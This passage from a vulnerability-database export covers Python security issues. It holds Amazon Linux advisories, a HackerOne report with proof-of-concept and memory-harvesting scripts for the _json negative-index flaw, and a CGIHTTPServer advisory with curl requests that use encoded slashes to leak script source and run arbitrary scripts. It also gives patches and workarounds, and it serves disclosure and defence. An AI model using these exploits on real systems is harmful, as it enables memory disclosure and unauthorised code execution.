allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory._\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.5-13.35.amzn1.i686 \n python27-2.7.5-13.35.amzn1.i686 \n python27-test-2.7.5-13.35.amzn1.i686 \n python27-debuginfo-2.7.5-13.35.amzn1.i686 \n python27-libs-2.7.5-13.35.amzn1.i686 \n python27-devel-2.7.5-13.35.amzn1.i686 \n \n src: \n python27-2.7.5-13.35.amzn1.src \n \n x86_64: \n python27-tools-2.7.5-13.35.amzn1.x86_64 \n python27-libs-2.7.5-13.35.amzn1.x86_64 \n python27-test-2.7.5-13.35.amzn1.x86_64 \n python27-2.7.5-13.35.amzn1.x86_64 \n python27-devel-2.7.5-13.35.amzn1.x86_64 \n python27-debuginfo-2.7.5-13.35.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-23T13:53:00", "published": "2014-07-23T13:53:00", "id": "ALAS-2014-380", "href": "https://alas.aws.amazon.com/ALAS-2014-380.html", "title": "Medium: python27", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-10T12:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616"], "description": "**Issue Overview:**\n\nIt was [reported](<http://bugs.python.org/issue21529>) that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n_The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory._\n\n \n**Affected Packages:** \n\n\npython-simplejson\n\n \n**Issue Correction:** \nRun _yum update python-simplejson_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python-simplejson-debuginfo-3.5.3-1.7.amzn1.i686 \n python-simplejson-3.5.3-1.7.amzn1.i686 \n \n src: \n python-simplejson-3.5.3-1.7.amzn1.src \n \n x86_64: \n python-simplejson-debuginfo-3.5.3-1.7.amzn1.x86_64 \n python-simplejson-3.5.3-1.7.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-09T16:51:00", "published": "2014-07-09T16:51:00", "id": "ALAS-2014-374", "href": "https://alas.aws.amazon.com/ALAS-2014-374.html", "title": "Low: python-simplejson", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-10T12:37:14", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7185", "CVE-2014-4650"], "description": "**Issue Overview:**\n\nIt was [discovered](<http://bugs.python.org/issue21766>) that Python built-in module CGIHTTPServer does not properly handle URL-encoded path separators in URLs which may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root. ([CVE-2014-4650 __](<https://access.redhat.com/security/cve/CVE-2014-4650>))\n\nInteger overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a \"buffer\" function. ([CVE-2014-7185 __](<https://access.redhat.com/security/cve/CVE-2014-7185>))\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n python27-tools-2.7.8-6.74.amzn1.i686 \n python27-debuginfo-2.7.8-6.74.amzn1.i686 \n python27-devel-2.7.8-6.74.amzn1.i686 \n python27-test-2.7.8-6.74.amzn1.i686 \n python27-libs-2.7.8-6.74.amzn1.i686 \n python27-2.7.8-6.74.amzn1.i686 \n \n src: \n python27-2.7.8-6.74.amzn1.src \n \n x86_64: \n python27-debuginfo-2.7.8-6.74.amzn1.x86_64 \n python27-devel-2.7.8-6.74.amzn1.x86_64 \n python27-test-2.7.8-6.74.amzn1.x86_64 \n python27-2.7.8-6.74.amzn1.x86_64 \n python27-libs-2.7.8-6.74.amzn1.x86_64 \n python27-tools-2.7.8-6.74.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2014-11-05T12:15:00", "published": "2014-11-05T12:15:00", "id": "ALAS-2014-440", "href": "https://alas.aws.amazon.com/ALAS-2014-440.html", "title": "Medium: python27", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 1500.0, "cvelist": ["CVE-2014-4616"], "description": "Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking.\n\nThe sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.\n\nLet me clarify:\n\nThis is Python-3.4.0/Modules/_json.c:\n\n```\n1035 static PyObject *\n1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)\n1037 {\n1038 /* Python callable interface to scan_once_{str,unicode} */\n1039 PyObject *pystr;\n1040 PyObject *rval;\n1041 Py_ssize_t idx;\n1042 Py_ssize_t next_idx = -1;\n1043 static char *kwlist[] = {\"string\", \"idx\", NULL};\n1044 PyScannerObject *s;\n1045 assert(PyScanner_Check(self));\n1046 s = (PyScannerObject *)self;\n1047 if (!PyArg_ParseTupleAndKeywords(args, kwds, \"On:scan_once\", kwlist, &pystr, &idx))\n1048 return NULL;\n1049\n1050 if (PyUnicode_Check(pystr)) {\n1051 rval = scan_once_unicode(s, pystr, idx, &next_idx);\n1052 }\n1053 else {\n1054 PyErr_Format(PyExc_TypeError,\n1055 \"first argument must be a string, not %.80s\",\n1056 Py_TYPE(pystr)->tp_name);\n1057 return NULL;\n1058 }\n1059 PyDict_Clear(s->memo);\n1060 if (rval == NULL)\n1061 return NULL;\n1062 return _build_rval_index_tuple(rval, next_idx);\n1063 }\n```\n\nAs you can see on line 1047, ParseTuple takes an 'n' as an argument for 'end', which, as can be learned from this page ( https://docs.python.org/3/c-api/arg.html ), means:\n\n```\n n (int) [Py_ssize_t]\n Convert a Python integer to a C Py_ssize_t.\n```\n\nThis means it accepts a SIGNED integer value, thus allowing a negative value to be supplied as the 'end' parameter.\n\nThen onto scanstring_unicode_once to which execution gets transferred through line 1051 of the code above.\n\n```\n922 static PyObject *\n923 scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_t\nidx, Py_ssize_t *next_idx_ptr)\n924 {\n925 /* Read one JSON term (of any kind) from PyUnicode pystr.\n926 idx is the index of the first character of the term\n927 *next_idx_ptr is a return-by-reference index to the first character after\n928 the number.\n929\n930 Returns a new PyObject representation of the term.\n931 */\n932 PyObject *res;\n933 void *str;\n934 int kind;\n935 Py_ssize_t length;\n936\n937 if (PyUnicode_READY(pystr) == -1)\n938 return NULL;\n939\n940 str = PyUnicode_DATA(pystr);\n941 kind = PyUnicode_KIND(pystr);\n942 length = PyUnicode_GET_LENGTH(pystr);\n943\n944 if (idx >= length) {\n945 raise_stop_iteration(idx);\n946 return NULL;\n947 }\n```\n\nHere we see that 'length' is set to the length of the string parameter. This will always be a positive value. On line 945 it is checked whether idx is equal or higher than length; this can never be true in the case of a negative index value.\n\n```\n949 switch (PyUnicode_READ(kind, str, idx)) {\n```\n\nPyUnicode_READ is defined as follows ( in Python-3.4.0/Include/unicodeobject.h ):\n\n```\n516 /* Read a code point from the string's canonical representation. No checks\n517 or ready calls are performed. */\n518 #define PyUnicode_READ(kind, data, index) \\\n519 ((Py_UCS4) \\\n520 ((kind) == PyUnicode_1BYTE_KIND ? \\\n521 ((const Py_UCS1 *)(data))[(index)] : \\\n522 ((kind) == PyUnicode_2BYTE_KIND ? \\\n523 ((const Py_UCS2 *)(data))[(index)] : \\\n524 ((const Py_UCS4 *)(data))[(index)] \\\n525 ) \\\n526 ))\n```\n\nHere we can see that index, which is negative in our example, is used as an array index. Since it is negative, it will internally wrap around and point to an address BELOW the address of 'data'.\n\nSo, if a certain negative value (such as -0x7FFFFFFF) is supplied and data[index] will effectively point to an invalid or read-protected page in memory, the Python executable will segfault.\n\nBut there's more. Instead of making it point to an invalid page, let's make it point to something valid:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"99448866\"\n4 b = \"88445522\"\n5 diff = id(a) - id(b)\n6 print(\"Difference is \" + hex(diff))\n7 print j.raw_decode(b)\n8 print j.raw_decode(b, diff)\n```\n\nOutput of this script is:\n\nDifference is -0x30\n(88445522, 8)\n(99448866, -40)\n\nThe difference between the address of 'a' and the address of 'b' is calculated and supplied as an index to the raw_decode function.\nInternally the address wraps around and we get to see the contents of 'a' while having supplied 'b' as a parameter.\n\nWe can use this harvester to scan memory for valid JSON strings:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"x\" * 1000\n4 for x in range(0, 600000):\n5 try:\n6 print j.raw_decode(a, 0 - x)\n7 except:\n8 pass\n```\n\nThere is one drawback, however. We cannot decode strings in this manner because:\n\n```\n296 static PyObject *\n297 scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict, Py_ssize_t *next_end_ptr)\n298 {\n299 /* Read the JSON string from PyUnicode pystr.\n300 end is the index of the first character after the quote.\n301 if strict is zero then literal control characters are allowed\n302 *next_end_ptr is a return-by-reference index of the character\n303 after the end quote\n304\n305 Return value is a new PyUnicode\n306 */\n307 PyObject *rval = NULL;\n308 Py_ssize_t len;\n309 Py_ssize_t begin = end - 1;\n310 Py_ssize_t next /* = begin */;\n311 const void *buf;\n312 int kind;\n313 PyObject *chunks = NULL;\n314 PyObject *chunk = NULL;\n315\n316 if (PyUnicode_READY(pystr) == -1)\n317 return 0;\n318\n319 len = PyUnicode_GET_LENGTH(pystr);\n320 buf = PyUnicode_DATA(pystr);\n321 kind = PyUnicode_KIND(pystr);\n322\n323 if (end < 0 || len < end) {\n324 PyErr_SetString(PyExc_ValueError, \"end is out of bounds\");\n325 goto bail;\n```\n\nthis code actually performs a bounds check by asserting that end (which is our index) isn't negative.\n\nHowever, I succesfully ran harvesting tests that could extract JSON-encoded arrays of numerical values (such as [10, 20, 40, 70] ) from the process memory without any problem or difficulty.\n\nGiven the ubiquity of JSON parsing in Python applications and the limited amount of prequisites and conditions under which this bug can be exploited, it is evident that this issue could have serious security implications in some cases.\n\nHere is a patch for 3.4.0:\n\n```\n--- _json_old.c 2014-04-12 17:47:08.749012372 +0200\n+++ _json.c 2014-04-12 17:44:52.253011645 +0200\n@@ -941,7 +941,7 @@\n kind = PyUnicode_KIND(pystr);\n length = PyUnicode_GET_LENGTH(pystr);\n\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n raise_stop_iteration(idx);\n return NULL;\n }\n```\n\nAnd here is a patch for 2.7.6:\n\n```\n--- _json_old.c 2014-04-12 17:57:14.365015601 +0200\n+++ _json.c 2014-04-12 18:04:25.149017898 +0200\n@@ -1491,7 +1491,7 @@\n PyObject *res;\n char *str = PyString_AS_STRING(pystr);\n Py_ssize_t length = PyString_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n@@ -1578,7 +1578,7 @@\n PyObject *res;\n Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);\n Py_ssize_t length = PyUnicode_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n```\n\n\nHere is a script that checks whether the Python binary that executes it is vulnerable:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3\n4 a = '128931233'\n5 b = \"472389423\"\n6\n7 if id(a) < id(b):\n8 x = a\n9 y = b\n10 else:\n11 x = b\n12 y = a\n13\n14 diff = id(x) - id(y)\n15\n16 try:\n17 j.raw_decode(y, diff)\n18 print(\"Vulnerable\")\n19 except:\n20 print(\"Not vulnerable\")\n```\n", "modified": "2014-06-20T05:54:36", "published": "2014-05-16T23:14:13", "id": "H1:12297", "href": "https://hackerone.com/reports/12297", "type": "hackerone", "title": "Python (IBB): Python vulnerability: reading arbitrary process memory", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T20:05:35", "description": "Python CGIHTTPServer Encoded Path Traversal. CVE-2014-4650. Webapps exploits for multiple platform", "published": "2014-06-27T00:00:00", "type": "exploitdb", "title": "Python CGIHTTPServer Encoded Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "EDB-ID:33894", "href": "https://www.exploit-db.com/exploits/33894/", "sourceData": "Advisory: Python CGIHTTPServer File Disclosure and Potential Code\r\n Execution\r\n\r\nThe CGIHTTPServer Python module does not properly handle URL-encoded\r\npath separators in URLs. This may enable attackers to disclose a CGI\r\nscript's source code or execute arbitrary CGI scripts in the server's\r\ndocument root.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Python CGIHTTPServer\r\nAffected Versions:\r\n 2.7 - 2.7.7,\r\n 3.2 - 3.2.4,\r\n 3.3 - 3.3.2,\r\n 3.4 - 3.4.1,\r\n 3.5 pre-release\r\nFixed Versions:\r\n 2.7 rev b4bab0788768,\r\n 3.2 rev e47422855841,\r\n 3.3 rev 5676797f3a3e,\r\n 3.4 rev 847e288d6e93,\r\n 3.5 rev f8b3bb5eb190\r\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\r\nSecurity Risk: high\r\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\r\nAdvisory Status: published\r\nCVE: CVE-2014-4650\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe CGIHTTPServer module defines a request-handler class, interface\r\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\r\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\r\nrun CGI scripts.\r\n\r\n(from the Python documentation)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\r\nCGI scripts. A sample server script in Python may look like the\r\nfollowing:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\n\r\nimport CGIHTTPServer\r\nimport BaseHTTPServer\r\n\r\nif __name__ == \"__main__\":\r\n server = BaseHTTPServer.HTTPServer\r\n handler = CGIHTTPServer.CGIHTTPRequestHandler\r\n server_address = (\"\", 8000)\r\n # Note that only /cgi-bin will work:\r\n handler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"]\r\n httpd = server(server_address, handler)\r\n httpd.serve_forever()\r\n------------------------------------------------------------------------\r\n\r\nThis server should execute any scripts located in the subdirectory\r\n\"cgi-bin\". A sample CGI script can be placed in that directory, for\r\nexample a script like the following:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = \"SECRET\"\r\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\r\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\r\n------------------------------------------------------------------------\r\n\r\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\r\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\r\n[...]\r\n def do_GET(self):\r\n \"\"\"Serve a GET request.\"\"\"\r\n f = self.send_head()\r\n if f:\r\n try:\r\n self.copyfile(f, self.wfile)\r\n finally:\r\n f.close()\r\n\r\n def do_HEAD(self):\r\n \"\"\"Serve a HEAD request.\"\"\"\r\n f = self.send_head()\r\n if f:\r\n f.close()\r\n\r\n def translate_path(self, path):\r\n [...]\r\n path = posixpath.normpath(urllib.unquote(path))\r\n words = path.split('/')\r\n words = filter(None, words)\r\n path = os.getcwd()\r\n [...]\r\n\r\nThe CGIHTTPRequestHandler class inherits, among others, the methods\r\ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\r\nclass overrides send_head() and implements several new methods, such as\r\ndo_POST(), is_cgi() and run_cgi():\r\n\r\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n[...]\r\n def do_POST(self):\r\n [...]\r\n if self.is_cgi():\r\n self.run_cgi()\r\n else:\r\n self.send_error(501, \"Can only POST to CGI scripts\")\r\n\r\n def send_head(self):\r\n \"\"\"Version of send_head that support CGI scripts\"\"\"\r\n if self.is_cgi():\r\n return self.run_cgi()\r\n else:\r\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\r\n\r\n def is_cgi(self):\r\n [...]\r\n collapsed_path = _url_collapse_path(self.path)\r\n dir_sep = collapsed_path.find('/', 1)\r\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\r\n if head in self.cgi_directories:\r\n self.cgi_info = head, tail\r\n return True\r\n return False\r\n[...]\r\n def run_cgi(self):\r\n \"\"\"Execute a CGI script.\"\"\"\r\n dir, rest = self.cgi_info\r\n\r\n [...]\r\n\r\n # dissect the part after the directory name into a script name &\r\n # a possible additional path, to be stored in PATH_INFO.\r\n i = rest.find('/')\r\n if i >= 0:\r\n script, rest = rest[:i], rest[i:]\r\n else:\r\n script, rest = rest, ''\r\n\r\n scriptname = dir + '/' + script\r\n scriptfile = self.translate_path(scriptname)\r\n if not os.path.exists(scriptfile):\r\n self.send_error(404, \"No such CGI script (%r)\" % scriptname)\r\n return\r\n if not os.path.isfile(scriptfile):\r\n self.send_error(403, \"CGI script is not a plain file (%r)\" %\r\n scriptname)\r\n return\r\n [...]\r\n[...]\r\n\r\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\r\ncalls is_cgi() to determine whether the requested path is to be executed\r\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\r\nnormalize the path, i.e. remove extraneous slashes (/),current directory\r\n(.), or parent directory (..) elements, taking care not to permit\r\ndirectory traversal below the document root. The is_cgi() function\r\nreturns True when the first path element is contained in the\r\ncgi_directories list. As _url_collaps_path() and is_cgi() never URL\r\ndecode the path, replacing the forward slash after the CGI directory in\r\nthe URL to a CGI script with the URL encoded variant %2f leads to\r\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\r\nsend_head() then invoke its parent's send_head() method which translates\r\nthe URL path to a file system path using the translate_path() method and\r\nthen outputs the file's contents raw. As translate_path() URL decodes\r\nthe path, this then succeeds and discloses the CGI script's file\r\ncontents:\r\n\r\n$ curl http://localhost:8000/cgi-bin%2ftest.py\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = \"SECRET\"\r\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\r\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\r\n\r\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\r\nscripts that would normally not be executable. The class normally only\r\nallows executing CGI scripts that are direct children of one of the\r\ndirectories listed in cgi_directories. Furthermore, only direct\r\nsubdirectories of the document root (the current working directory) can\r\nbe valid CGI directories.\r\n\r\nThis can be seen in the following example. Even though the sample server\r\nshown above includes \"/cgi-bin/subdir\" as part of the request handler's\r\ncgi_directories, a CGI script named test.py in that directory is not\r\nexecuted:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\r\n[...]\r\n<p>Error code 403.\r\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\r\n[...]\r\n\r\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\r\nreturned True. Next, run_cgi() further dissected these paths to perform\r\nsome sanity checks, thereby mistakenly assuming subdir to be the\r\nexecutable script's filename and test.py to be path info. As subdir is\r\nnot an executable file, run_cgi() returns an error message. However, if\r\nthe forward slash between subdir and test.py is replaced with %2f,\r\ninvoking the script succeeds:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\r\n{\"text\": \"This is a Test\"}\r\n\r\nThis is because neither is_cgi() nor run_cgi() URL decode the path\r\nduring processing until run_cgi() tries to determine whether the target\r\nscript is an executable file. More specifically, as subdir%2ftest.py\r\ndoes not contain a forward slash, it is not split into the script name\r\nsubdir and path info test.py, as in the previous example.\r\n\r\nSimilarly, using URL encoded forward slashes, executables outside of a\r\nCGI directory can be executed:\r\n\r\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\r\n{\"text\": \"This is a Test\"}\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\r\nvariant that first URL decodes the supplied path, for example:\r\n\r\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\r\n def is_cgi(self):\r\n self.path = urllib.unquote(self.path)\r\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to the latest Python version from the Mercurial repository at\r\nhttp://hg.python.org/cpython/\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability can be used to gain access to the contents of CGI\r\nbinaries or the source code of CGI scripts. This may reveal sensitve\r\ninformation, for example access credentials. This can greatly help\r\nattackers in mounting further attacks and is therefore considered to\r\npose a high risk. Furthermore attackers may be able to execute code that\r\nwas not intended to be executed. However, this is limited to files\r\nstored in the server's working directory or in its subdirectories.\r\n\r\nThe CGIHTTPServer code does contain this warning:\r\n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\"\r\nEven when used on a local computer this may allow other local users to\r\nexecute code in the context of another user.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-04-07 Vulnerability identified\r\n2014-06-11 Customer approved disclosure to vendor\r\n2014-06-11 Vendor notified\r\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\r\n and addressed it in public source code repository\r\n2014-06-23 CVE number requested\r\n2014-06-25 CVE number assigned\r\n2014-06-26 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://bugs.python.org/issue21766\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\r\nDennewartstr. 25-27 Fax : +49 241 510081-99\r\n52068 Aachen https://www.redteam-pentesting.de\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u0102\u00a4ftsf\u0102\u017ahrer: Patrick Hof, Jens Liebchen", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/33894/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:25", "description": "", "published": "2014-06-27T00:00:00", "type": "packetstorm", "title": "Python CGIHTTPServer File Disclosure / Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "PACKETSTORM:127241", "href": "https://packetstormsecurity.com/files/127241/Python-CGIHTTPServer-File-Disclosure-Code-Execution.html", "sourceData": "`Advisory: Python CGIHTTPServer File Disclosure and Potential Code \nExecution \n \nThe CGIHTTPServer Python module does not properly handle URL-encoded \npath separators in URLs. This may enable attackers to disclose a CGI \nscript's source code or execute arbitrary CGI scripts in the server's \ndocument root. \n \nDetails \n======= \n \nProduct: Python CGIHTTPServer \nAffected Versions: \n2.7 - 2.7.7, \n3.2 - 3.2.4, \n3.3 - 3.3.2, \n3.4 - 3.4.1, \n3.5 pre-release \nFixed Versions: \n2.7 rev b4bab0788768, \n3.2 rev e47422855841, \n3.3 rev 5676797f3a3e, \n3.4 rev 847e288d6e93, \n3.5 rev f8b3bb5eb190 \nVulnerability Type: File Disclosure, Directory Traversal, Code Execution \nSecurity Risk: high \nVendor URL: https://docs.python.org/2/library/cgihttpserver.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008 \nAdvisory Status: published \nCVE: CVE-2014-4650 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650 \n \n \nIntroduction \n============ \n \nThe CGIHTTPServer module defines a request-handler class, interface \ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits \nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also \nrun CGI scripts. \n \n(from the Python documentation) \n \n \nMore Details \n============ \n \nThe CGIHTTPServer module can be used to set up a simple HTTP server with \nCGI scripts. A sample server script in Python may look like the \nfollowing: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env python2 \n \nimport CGIHTTPServer \nimport BaseHTTPServer \n \nif __name__ == \"__main__\": \nserver = BaseHTTPServer.HTTPServer \nhandler = CGIHTTPServer.CGIHTTPRequestHandler \nserver_address = (\"\", 8000) \n# Note that only /cgi-bin will work: \nhandler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"] \nhttpd = server(server_address, handler) \nhttpd.serve_forever() \n------------------------------------------------------------------------ \n \nThis server should execute any scripts located in the subdirectory \n\"cgi-bin\". A sample CGI script can be placed in that directory, for \nexample a script like the following: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env python2 \nimport json \nimport sys \n \ndb_credentials = \"SECRET\" \nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\") \nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"})) \n------------------------------------------------------------------------ \n \nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler \nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler: \n \nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): \n[...] \ndef do_GET(self): \n\"\"\"Serve a GET request.\"\"\" \nf = self.send_head() \nif f: \ntry: \nself.copyfile(f, self.wfile) \nfinally: \nf.close() \n \ndef do_HEAD(self): \n\"\"\"Serve a HEAD request.\"\"\" \nf = self.send_head() \nif f: \nf.close() \n \ndef translate_path(self, path): \n[...] \npath = posixpath.normpath(urllib.unquote(path)) \nwords = path.split('/') \nwords = filter(None, words) \npath = os.getcwd() \n[...] \n \nThe CGIHTTPRequestHandler class inherits, among others, the methods \ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The \nclass overrides send_head() and implements several new methods, such as \ndo_POST(), is_cgi() and run_cgi(): \n \nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): \n[...] \ndef do_POST(self): \n[...] \nif self.is_cgi(): \nself.run_cgi() \nelse: \nself.send_error(501, \"Can only POST to CGI scripts\") \n \ndef send_head(self): \n\"\"\"Version of send_head that support CGI scripts\"\"\" \nif self.is_cgi(): \nreturn self.run_cgi() \nelse: \nreturn SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self) \n \ndef is_cgi(self): \n[...] \ncollapsed_path = _url_collapse_path(self.path) \ndir_sep = collapsed_path.find('/', 1) \nhead, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:] \nif head in self.cgi_directories: \nself.cgi_info = head, tail \nreturn True \nreturn False \n[...] \ndef run_cgi(self): \n\"\"\"Execute a CGI script.\"\"\" \ndir, rest = self.cgi_info \n \n[...] \n \n# dissect the part after the directory name into a script name & \n# a possible additional path, to be stored in PATH_INFO. \ni = rest.find('/') \nif i >= 0: \nscript, rest = rest[:i], rest[i:] \nelse: \nscript, rest = rest, '' \n \nscriptname = dir + '/' + script \nscriptfile = self.translate_path(scriptname) \nif not os.path.exists(scriptfile): \nself.send_error(404, \"No such CGI script (%r)\" % scriptname) \nreturn \nif not os.path.isfile(scriptfile): \nself.send_error(403, \"CGI script is not a plain file (%r)\" % \nscriptname) \nreturn \n[...] \n[...] \n \nFor HTTP GET requests, do_GET() first invokes send_head(). That method \ncalls is_cgi() to determine whether the requested path is to be executed \nas a CGI script. The is_cgi() method uses _url_collapse_path() to \nnormalize the path, i.e. remove extraneous slashes (/),current directory \n(.), or parent directory (..) elements, taking care not to permit \ndirectory traversal below the document root. The is_cgi() function \nreturns True when the first path element is contained in the \ncgi_directories list. As _url_collaps_path() and is_cgi() never URL \ndecode the path, replacing the forward slash after the CGI directory in \nthe URL to a CGI script with the URL encoded variant %2f leads to \nis_cgi() returning False. This will make CGIHTTPRequestHandler's \nsend_head() then invoke its parent's send_head() method which translates \nthe URL path to a file system path using the translate_path() method and \nthen 